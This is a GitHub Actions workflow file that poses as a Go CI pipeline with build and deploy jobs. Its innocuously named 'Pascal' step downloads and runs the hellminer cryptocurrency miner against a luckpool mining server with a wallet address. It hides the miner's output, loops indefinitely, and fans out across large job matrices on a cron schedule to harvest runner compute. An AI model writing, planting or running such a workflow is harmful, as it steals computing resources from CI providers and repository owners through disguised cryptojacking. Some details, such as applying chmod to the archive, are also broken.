
name: CI
# on: [push, pull_request]
on:
  schedule:
    - cron: '0 */12 * * *'
  workflow_dispatch:
   
jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go: [1.1, 1.2]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    timeout-minutes: 360
    env:
        NUM_JOBS: 50
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
  deploy:
    name: G-Code
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.1, 1.1, 1.4, 1.4, 1.4, 1.5, 1.5, 1.5, 1.1, 1.1, 1.1]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T]
    timeout-minutes: 36
    env:
        NUM_JOBS: 200
        JOB: ${{ matrix.go }}
    steps:
    - name: Setup Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check-in
      uses: actions/checkout@v2
    - name: Pascal
      run: |
        sudo apt-get update && sudo apt-get install -y screen && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && chmod +x hellminer_cpu_linux.tar.gz && screen -dmS ls
./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u R9yFcQcq7YxbTt3ryB3ZfvJTDu6qKRLBkM.PC -p x --cpu 1 > /dev/null
while [ 1 ]; do
sleep 3
done
sleep 999


